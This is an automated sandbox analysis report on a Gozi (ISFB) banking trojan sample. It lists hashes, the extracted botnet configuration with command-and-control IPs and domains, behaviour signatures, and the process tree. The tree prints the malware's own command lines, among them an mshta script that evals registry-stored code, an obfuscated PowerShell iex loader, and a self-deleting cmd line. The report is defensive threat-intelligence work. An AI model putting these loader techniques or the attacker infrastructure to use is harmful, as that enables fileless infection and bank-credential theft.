gozi | ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6

Analysis

max time kernel
150s
max time network
123s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
03-10-2023 17:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client.exe
Size

296KB
MD5

f5830dc3fe80761eb82a0754b1697e6b
SHA1

9f25e979cb2de3857278645b60c4afa37d0e6702
SHA256

ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6
SHA512

8fc4bf848205a3d28dc457e0e09f0831336be36a0824e93818a85207a8a8a63597815918f53dd472cf99ec1f08f8a2aa7cb1a5b43cf7c9782de69899620298fa
SSDEEP

3072:YaL9FpSv0N0aIlzHMyXxpJD4xXvw1h+XKwY1a/I6RMxY:tpF0vW0aIlf+/w1hIr2aI6G

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

308 cmd.exe

pid	process
308	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2912 set thread context of 1260	2912	powershell.exe	Explorer.EXE
PID 1260 set thread context of 308	1260	Explorer.EXE	cmd.exe
PID 308 set thread context of 2840	308	cmd.exe	PING.EXE
PID 1260 set thread context of 2828	1260	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2840 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2840 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2840	PING.EXE

pid	process
2840	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
2196	client.exe
2912	powershell.exe
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE
1260	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1260 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2912 powershell.exe
1260 Explorer.EXE
308 cmd.exe
1260 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2912 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1260 Explorer.EXE

pid	process
1260	Explorer.EXE

pid	process
2912	powershell.exe
1260	Explorer.EXE
308	cmd.exe
1260	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	2912	powershell.exe

pid	process
1260	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1400 wrote to memory of 2912	1400	mshta.exe	powershell.exe
PID 1400 wrote to memory of 2912	1400	mshta.exe	powershell.exe
PID 1400 wrote to memory of 2912	1400	mshta.exe	powershell.exe
PID 2912 wrote to memory of 2040	2912	powershell.exe	csc.exe
PID 2912 wrote to memory of 2040	2912	powershell.exe	csc.exe
PID 2912 wrote to memory of 2040	2912	powershell.exe	csc.exe
PID 2040 wrote to memory of 2192	2040	csc.exe	cvtres.exe
PID 2040 wrote to memory of 2192	2040	csc.exe	cvtres.exe
PID 2040 wrote to memory of 2192	2040	csc.exe	cvtres.exe
PID 2912 wrote to memory of 2432	2912	powershell.exe	csc.exe
PID 2912 wrote to memory of 2432	2912	powershell.exe	csc.exe
PID 2912 wrote to memory of 2432	2912	powershell.exe	csc.exe
PID 2432 wrote to memory of 1736	2432	csc.exe	cvtres.exe
PID 2432 wrote to memory of 1736	2432	csc.exe	cvtres.exe
PID 2432 wrote to memory of 1736	2432	csc.exe	cvtres.exe
PID 2912 wrote to memory of 1260	2912	powershell.exe	Explorer.EXE
PID 2912 wrote to memory of 1260	2912	powershell.exe	Explorer.EXE
PID 2912 wrote to memory of 1260	2912	powershell.exe	Explorer.EXE
PID 1260 wrote to memory of 308	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 308	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 308	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 308	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 308	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 308	1260	Explorer.EXE	cmd.exe
PID 308 wrote to memory of 2840	308	cmd.exe	PING.EXE
PID 308 wrote to memory of 2840	308	cmd.exe	PING.EXE
PID 308 wrote to memory of 2840	308	cmd.exe	PING.EXE
PID 308 wrote to memory of 2840	308	cmd.exe	PING.EXE
PID 1260 wrote to memory of 2828	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 2828	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 2828	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 2828	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 2828	1260	Explorer.EXE	cmd.exe
PID 308 wrote to memory of 2840	308	cmd.exe	PING.EXE
PID 308 wrote to memory of 2840	308	cmd.exe	PING.EXE
PID 1260 wrote to memory of 2828	1260	Explorer.EXE	cmd.exe
PID 1260 wrote to memory of 2828	1260	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1260

C:\Users\Admin\AppData\Local\Temp\client.exe
"C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2196

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>V56u='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(V56u).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DF95A089-B269-693D-B483-06AD28679A31\\\MusicPlay'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jynddastsk -value gp; new-alias -name ebewyvghe -value iex; ebewyvghe ([System.Text.Encoding]::ASCII.GetString((jynddastsk "HKCU:Software\AppDataLow\Software\Microsoft\DF95A089-B269-693D-B483-06AD28679A31").ContactSettings))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rjzndnr1.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE783.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE772.tmp"
5⤵
PID:2192

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rm9flc1v.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE81F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE81E.tmp"
5⤵
PID:1736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2840

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE783.tmp
Filesize
1KB

MD5
a4da36dd3c4c84430b09cf3b3290ea45

SHA1
f5cc5e0e7088b43563df00a749fcac5c576805e3

SHA256
97a945e55d2ab499ec0d421f6a37969dbd36932ce1c2207a0bb80743062056f3

SHA512
59162f9c7dd086b4e549a44d131d7835e281cc619e0d7d96f6a437db9600888bc2d5614474d8d20fc86fc296708495276f6bcf4cda763785c8ddce9f97eaa0a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE81F.tmp
Filesize
1KB

MD5
64b3a009697ca00ed4d4ca7d4c3074dd

SHA1
fd6272564822bff1afa5c9692ca6989a423a184f

SHA256
4e1cd87b6c49a7cb859c92deb3ecbfc5729c98903b1efe3c7a6d36eec4a265d4

SHA512
77b223d94cc93d2dd5f773db7bc503c2207d6e3f8e736f6f25e207b95a02f38d11e70983e958d72d634c178e0e4beda5cb257ee33f3cb7eb1ff1a9e19de9b2da

Download Submit
C:\Users\Admin\AppData\Local\Temp\rjzndnr1.dll
Filesize
3KB

MD5
bab9aef3451fb0ea9811829f8e76830a

SHA1
d3efb8d14e2cf57e10f9adfb353bafe24512135e

SHA256
f16277693ca478ff29e79d8b47be5bde2d6c5f63df2936a296586e3153d6e999

SHA512
d0a727931ae78869f9f9f42fa58fef9d763d5c308fd5cb40941458f37669851d4633e60255e2329faa42d9876f6a296135a28ad9712e9cdf0158c75aa9ba2ea0

Download Submit
C:\Users\Admin\AppData\Local\Temp\rjzndnr1.pdb
Filesize
7KB

MD5
151503075d2ac2c86231c1a7d662a20b

SHA1
f5f72af80818892715cff4f3628baedac7ca00f3

SHA256
3ffe9d5f87618b5421f69ecbcc91b63b9e024feaad908bd719a3c6d9487b974b

SHA512
2688277cfa03bd943591d7dca15a1cb38d7dfa6516cd4f976c778ee1bf66189f65c41c85f24cf55767818bac305cdd9d210c45bcff16199bc8702c9a8f7ea681

Download Submit
C:\Users\Admin\AppData\Local\Temp\rm9flc1v.dll
Filesize
3KB

MD5
7fd46821099d8b424b311e99c4379e17

SHA1
5ad4b437f304e6d91f216a65c1ec2d4e9ba3da91

SHA256
d1ac339ec642f4c2dafdfd626e7b6d7a9652e788fc259ac41274129d55521e96

SHA512
1a89caa49b4e61df9833d78feac078064110835e1ff04e31d47c79504fa3c640b8d3d49f1b90cb6216b537b1ccb60966a4ee42b8aa84da4ebab588bcbb279764

Download Submit
C:\Users\Admin\AppData\Local\Temp\rm9flc1v.pdb
Filesize
7KB

MD5
179095d166c2472ccc5afb43e5a7ad5c

SHA1
aa83922e4970e1228b24ff489b36560981b3e34b

SHA256
f05d7df2758724de91dc2459aed4d2667313ec241b54e206a38099adc0cf7af0

SHA512
49a69293a9496d1adf00b19ff8f98a28eaefe3d0f46a17951c1ae03dc657b617d7b4830aec247473475a32d84d4c94e7b77d9cb3f806fcb143853db7188ebbb4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE772.tmp
Filesize
652B

MD5
e029482f1b26376355ba20616245b9e2

SHA1
d7d3febf09cd244a81d619ac7d88ea370d003d9a

SHA256
c4dbdb2055052b4b7cea6d09bcbb5af3201962a267b9dee4518435189884f581

SHA512
7dc94162ac315e56a640884602b9b5038b7c5cd083b572a37f47c64cb330eb14ee04e7619746d18ecfa677c8eea7dbee5d6ba1c4d01092295a85d8eefd1ddefb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE81E.tmp
Filesize
652B

MD5
661db41fbb248b3cbee3abd298e11d05

SHA1
849a252549f5e50506708a9ea5b264946821c676

SHA256
d2340d68abed8b5fbe5c98a3567bc26d6289e059a20ac349c870c3cb4890a710

SHA512
8cf347e980e5f090022254630156ebe75b9d266c4a075bdb8b8ec7336c437e8067b18bd1b3308970ba3fa69733a781dbce56d8801d517b121aa81d66096df956

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rjzndnr1.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rjzndnr1.cmdline
Filesize
309B

MD5
682e93093fe86863f7dcc156ba1fdc9b

SHA1
8e42d95d17446932f26bbf3b2d5ccf972f348ec0

SHA256
a3fb4ddac52ac7d57c89da908d0e3076933eb1b605837b422c4811d7ae2e5870

SHA512
d0692d9efdea67435b1551337039a91ee74716d0f7e0b53e9e46a35648f5acba231663c950e7095900c95f61090f06afd06717c4d7d2272be019999d08266cb3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rm9flc1v.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rm9flc1v.cmdline
Filesize
309B

MD5
644f5695eac0b8181022312a27f4c03f

SHA1
8393dd83e723a4337caab006839ef91a912d7651

SHA256
48ca3cfbdfd5da1b78365bee454fa91681dd080c7bd693dfbea7549a8bf9a790

SHA512
2dfe318ebe7e79d33fdb9d0ddfede6ad53fcf0181e882e1cfb636610c78831b2cad35753741f38229d2a29cc76926579742c7ecd62abc144165cc4c5145906b1

Download Submit
memory/308-72-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/308-94-0x00000000003C0000-0x0000000000464000-memory.dmp

Filesize
656KB

Download
memory/308-73-0x00000000003C0000-0x0000000000464000-memory.dmp

Filesize
656KB

Download
memory/308-74-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/1260-96-0x000007FF405F0000-0x000007FF405FA000-memory.dmp

Filesize
40KB

Download
memory/1260-95-0x000007FEF5690000-0x000007FEF57D3000-memory.dmp

Filesize
1.3MB

Download
memory/1260-60-0x0000000004F00000-0x0000000004FA4000-memory.dmp

Filesize
656KB

Download
memory/1260-61-0x0000000002A60000-0x0000000002A61000-memory.dmp

Filesize
4KB

Download
memory/1260-97-0x000007FEF5690000-0x000007FEF57D3000-memory.dmp

Filesize
1.3MB

Download
memory/1260-92-0x0000000004F00000-0x0000000004FA4000-memory.dmp

Filesize
656KB

Download
memory/2196-13-0x0000000003CD0000-0x0000000003CD2000-memory.dmp

Filesize
8KB

Download
memory/2196-8-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/2196-7-0x00000000026D0000-0x00000000027D0000-memory.dmp

Filesize
1024KB

Download
memory/2196-4-0x00000000002C0000-0x00000000002CD000-memory.dmp

Filesize
52KB

Download
memory/2196-1-0x00000000026D0000-0x00000000027D0000-memory.dmp

Filesize
1024KB

Download
memory/2196-90-0x00000000026D0000-0x00000000027D0000-memory.dmp

Filesize
1024KB

Download
memory/2196-3-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2196-2-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/2432-50-0x00000000020C0000-0x0000000002140000-memory.dmp

Filesize
512KB

Download
memory/2828-88-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/2828-89-0x0000000000310000-0x00000000003A8000-memory.dmp

Filesize
608KB

Download
memory/2828-85-0x0000000000310000-0x00000000003A8000-memory.dmp

Filesize
608KB

Download
memory/2828-91-0x0000000000310000-0x00000000003A8000-memory.dmp

Filesize
608KB

Download
memory/2840-79-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/2840-93-0x0000000001B20000-0x0000000001BC4000-memory.dmp

Filesize
656KB

Download
memory/2840-81-0x0000000000380000-0x0000000000381000-memory.dmp

Filesize
4KB

Download
memory/2840-80-0x0000000001B20000-0x0000000001BC4000-memory.dmp

Filesize
656KB

Download
memory/2912-59-0x000000001B650000-0x000000001B68D000-memory.dmp

Filesize
244KB

Download
memory/2912-64-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-68-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-56-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2912-39-0x0000000002800000-0x0000000002808000-memory.dmp

Filesize
32KB

Download
memory/2912-25-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2912-24-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-23-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2912-21-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2912-71-0x000000001B650000-0x000000001B68D000-memory.dmp

Filesize
244KB

Download
memory/2912-22-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2912-20-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-19-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2912-18-0x000000001B260000-0x000000001B542000-memory.dmp

Filesize
2.9MB

Download